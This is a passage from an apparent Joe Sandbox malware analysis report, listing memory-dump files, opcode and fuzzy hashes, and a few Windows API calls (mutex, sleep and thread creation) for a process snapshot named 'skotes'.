                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 396266464-0
                                                                                                                                            • Opcode ID: 863101bc4d2dcf551cb47f64205da6b1df0ec214358d2a8c79597f74e369d0a5
                                                                                                                                            • Instruction ID: 24b4ecd6b05eb1471f01a0f5a067118c8ae96e0b8d6eb2c694329f7ffcdef6ca
                                                                                                                                            • Opcode Fuzzy Hash: 863101bc4d2dcf551cb47f64205da6b1df0ec214358d2a8c79597f74e369d0a5
                                                                                                                                            • Instruction Fuzzy Hash: 90312731710208CBEB08DB78DD89B7DBB72EF95318F24865CE014E72D2C73989808652
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00ACA7BA
                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 396266464-0
                                                                                                                                            • Opcode ID: 3fa3f3c83de0355bbf5248399408f00f20df954bd6c3df6cf3d08b5ca4a4e419
                                                                                                                                            • Instruction ID: 247aaf5a0966b95baa9c5718317e255f55174dd506b866589dd10b85ff1331dd
                                                                                                                                            • Opcode Fuzzy Hash: 3fa3f3c83de0355bbf5248399408f00f20df954bd6c3df6cf3d08b5ca4a4e419
                                                                                                                                            • Instruction Fuzzy Hash: 92312731B10108CBEB08DB78DD89F7DBB72AF95314F20835CE014A72D1DB3689818752
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5bb373eabcc7456cd4981578202e08e5511e6768ab722a613a12b25a9dbff9e4
                                                                                                                                            • Instruction ID: c16490454a0e0fcc8e975a2f1f5509553cf6dec2e262abf2f30f185587f38578
                                                                                                                                            • Opcode Fuzzy Hash: 5bb373eabcc7456cd4981578202e08e5511e6768ab722a613a12b25a9dbff9e4
                                                                                                                                            • Instruction Fuzzy Hash: 2021B37290520CAAEB11ABE8ED42BBF7729DF42374F200355FA642B1D1DB709E0597A1
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 69a35927d5572e283ce9bd34a4a51888ea98da725c059286d054b2265add49b7
                                                                                                                                            • Instruction ID: 3ae24a86aab5d8ee66b9a852441ad744dc2b3a982f58a9240b67af2f6ff31ccb
                                                                                                                                            • Opcode Fuzzy Hash: 69a35927d5572e283ce9bd34a4a51888ea98da725c059286d054b2265add49b7
                                                                                                                                            • Instruction Fuzzy Hash: FCE086213F9304D9EA1473BC688EF3E65948FE5B00F224B5CE614E70D3896549404563
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00AD6D11
                                                                                                                                            • Sleep.KERNEL32(00007530), ref: 00AD6D25
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateSleepThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4202482776-0
                                                                                                                                            • Opcode ID: 947146f50457926ab460ce343e3c795cccf3825efde2ad5f2349cdc607afbc47
                                                                                                                                            • Instruction ID: 28b2f728e55d004f49b73d0dbae4c1a623e7638c9eac3a557a18c97bf5d5b088
                                                                                                                                            • Opcode Fuzzy Hash: 947146f50457926ab460ce343e3c795cccf3825efde2ad5f2349cdc607afbc47
                                                                                                                                            • Instruction Fuzzy Hash: B9D08C307E0318F6F23013202C0BFA6BA30AB0EF00F658842B3893F1D0C5E4300047A8
                                                                                                                                            APIs
